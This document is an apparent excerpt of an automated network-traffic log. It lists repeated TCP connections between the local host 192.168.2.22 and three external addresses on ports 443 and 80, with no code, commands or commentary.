                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 85.215.206.82:80 -> 192.168.2.22:49169
